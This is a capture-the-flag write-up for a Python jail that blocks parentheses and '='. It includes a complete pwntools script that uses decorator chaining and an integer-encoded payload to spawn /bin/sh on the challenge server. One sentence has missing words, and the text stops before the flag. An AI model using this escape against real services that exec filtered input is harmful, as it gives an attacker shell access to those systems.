This challenge was analogue to the other python jails, but with some additional constraints:
Source code of the server:
line = input('>>> ') blacklist = "()=" for item in blacklist: if item in line.lower(): raise Exception() exec(line)
This challenge was not easy, as with no parenthesis you are not able to make any calls to a function.
However, after playing around for a while, we noticed that the
eval() python function
\r as newlines, and this let us send multi-line scripts through a single call
We then bypassed the parentheses usage through python decorators on an empty class, using an integer-encoded payload to avoid the parentheses check by the server.
This was our solution for this one:
from pwn import * io = connect('chal.b01lers.com', 1336) io.read() payload = """import pty for x in [[112,116,121,46,115,112,97,119,110,40,34,47,98,105,110,47,115,104,34,41]]: for y in [lambda z: x]: @print @eval @bytes @y class z: pass""".replace("\n", "\r") io.sendline(payload) io.interactive()
And this gives the following flag: